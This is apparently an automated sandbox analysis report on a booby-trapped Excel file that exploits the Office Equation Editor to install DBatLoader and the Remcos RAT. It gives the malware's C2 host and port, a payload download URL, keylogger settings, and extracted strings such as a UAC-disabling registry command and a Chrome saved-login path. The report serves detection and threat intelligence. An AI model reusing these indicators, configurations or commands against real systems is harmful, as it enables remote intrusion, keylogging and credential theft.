Edit tour

Windows Analysis Report
Home Purchase Contract and Property Details.xls

Overview

General Information

Sample name:	Home Purchase Contract and Property Details.xls
Analysis ID:	1446719
MD5:	d9d5c1fa0851c35ace66d98089584cbe
SHA1:	9fe664c1645be3bb5bd9b3f1292993f247600155
SHA256:	777fe31b0202e8e5cf13a9d1d9dea155bfd6e569392714d1e8f61d20048e70ba
Tags:	xls
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for dropped file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Remcos

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Contains functionality to register a low level keyboard hook

Contains functionalty to change the wallpaper

Delayed program exit found

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Drops PE files with benign system names

Excel sheet contains many unusual embedded objects

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Installs a global keyboard hook

Installs new ROOT certificates

Microsoft Office drops suspicious files

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Sigma detected: Equation Editor Network Connection

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious Process Parents

Sigma detected: System File Execution Location Anomaly

Uses dynamic DNS services

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Excel Network Connections

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Office Outbound Connections

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3172 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 3460 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

csrss.exe (PID: 3832 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" MD5: 913C99449A29C2640D36B0D5FDF69289)

extrac32.exe (PID: 3912 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF MD5: 4D306ED01994EDF577B98FD59BF269C0)

Efftwcmk.PIF (PID: 1696 cmdline: "C:\Users\Public\Libraries\Efftwcmk.PIF" MD5: 913C99449A29C2640D36B0D5FDF69289)

Efftwcmk.PIF (PID: 920 cmdline: "C:\Users\Public\Libraries\Efftwcmk.PIF" MD5: 913C99449A29C2640D36B0D5FDF69289)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo"]}

Threatname: Remcos

{"Host:Port:Password": "wwsaer.duckdns.org:8533:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9VASLD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x141e:$obj2: \objdata 0x1408:$obj3: \objupdate
C:\ProgramData\notes\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x141e:$obj2: \objdata 0x1408:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14a8:$a1: Remcos restarted by watchdog! 0x1a20:$a3: %02i:%02i:%02i:%03i
00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14a8:$a1: Remcos restarted by watchdog! 0x1a20:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4c0:$a1: Remcos restarted by watchdog! 0x6ca38:$a3: %02i:%02i:%02i:%03i
00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Process Memory Space: csrss.exe PID: 3832	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: csrss.exe PID: 3832	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1e57c0:$a1: Remcos restarted by watchdog! 0x1e5d1a:$a3: %02i:%02i:%02i:%03i 0x1e6151:$a3: %02i:%02i:%02i:%03i
Process Memory Space: Efftwcmk.PIF PID: 1696	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Efftwcmk.PIF PID: 1696	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Efftwcmk.PIF PID: 1696	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Efftwcmk.PIF PID: 1696	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xc2dc:$a1: Remcos restarted by watchdog! 0x6908a:$a1: Remcos restarted by watchdog! 0xc836:$a3: %02i:%02i:%02i:%03i 0xcc65:$a3: %02i:%02i:%02i:%03i 0x695e5:$a3: %02i:%02i:%02i:%03i 0x69a14:$a3: %02i:%02i:%02i:%03i
Process Memory Space: Efftwcmk.PIF PID: 920	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Efftwcmk.PIF PID: 920	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x103e:$a1: Remcos restarted by watchdog! 0x1599:$a3: %02i:%02i:%02i:%03i 0x19d0:$a3: %02i:%02i:%02i:%03i
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.Efftwcmk.PIF.2c70000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
11.2.Efftwcmk.PIF.2c70000.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
11.2.Efftwcmk.PIF.2d220000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.Efftwcmk.PIF.2d220000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.Efftwcmk.PIF.2d220000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
11.2.Efftwcmk.PIF.2d220000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
11.2.Efftwcmk.PIF.2d220000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
11.2.Efftwcmk.PIF.2d220000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.Efftwcmk.PIF.2d220000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.Efftwcmk.PIF.2d220000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b8a8:$a1: Remcos restarted by watchdog! 0x6be20:$a3: %02i:%02i:%02i:%03i
11.2.Efftwcmk.PIF.2d220000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x658fc:$str_a1: C:\Windows\System32\cmd.exe 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6596c:$str_b2: Executing file: 0x669ec:$str_b3: GetDirectListeningPort 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66518:$str_b7: \update.vbs 0x65994:$str_b9: Downloaded file: 0x65980:$str_b10: Downloading file: 0x65a24:$str_b12: Failed to upload file: 0x669b4:$str_b13: StartForward 0x669d4:$str_b14: StopForward 0x66470:$str_b15: fso.DeleteFile " 0x66404:$str_b16: On Error Resume Next 0x664a0:$str_b17: fso.DeleteFolder " 0x65a14:$str_b18: Uploaded file: 0x659d4:$str_b19: Unable to delete: 0x66438:$str_b20: while fso.FileExists(" 0x65eb1:$str_c0: [Firefox StoredLogins not found]
11.2.Efftwcmk.PIF.2d220000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6577c:$s1: CoGetObject 0x65790:$s1: CoGetObject 0x657ac:$s1: CoGetObject 0x6f738:$s1: CoGetObject 0x6573c:$s2: Elevation:Administrator!new:
Click to see the 7 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 94.156.67.72, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 94.156.67.72, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Efftwcmk.PIF, NewProcessName: C:\Users\Public\Libraries\Efftwcmk.PIF, OriginalFileName: C:\Users\Public\Libraries\Efftwcmk.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , ProcessId: 1696, ProcessName: Efftwcmk.PIF

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Efftwcmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Efftwcmk

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, CommandLine: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\extrac32.exe, NewProcessName: C:\Windows\SysWOW64\extrac32.exe, OriginalFileName: C:\Windows\SysWOW64\extrac32.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 3832, ParentProcessName: csrss.exe, ProcessCommandLine: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF, ProcessId: 3912, ProcessName: extrac32.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Efftwcmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Efftwcmk

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3172, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Efftwcmk.PIF, NewProcessName: C:\Users\Public\Libraries\Efftwcmk.PIF, OriginalFileName: C:\Users\Public\Libraries\Efftwcmk.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Efftwcmk.PIF" , ProcessId: 1696, ProcessName: Efftwcmk.PIF

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3172, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3172, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3172, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 3832, ProcessName: csrss.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 4F 4E 5E C8 87 8C 53 B6 E6 9F 0E 9D 24 DF EF 56 32 48 F2 28 F1 5A 9E 90 AD 95 78 59 75 29 F2 B8 F0 51 1A 71 9A B4 E7 9B B5 71 91 4E 12 F2 FE FA 3D CE 90 35 F3 D1 6B 6A C5 F0 B5 4D EC 0B 7E CC 41 91 2C 9D 68 48 A8 65 FB B2 40 E2 F6 A6 D2 58 B2 A6 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 3832, TargetObject: HKEY_CURRENT_USER\Software\Rmc-9VASLD\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

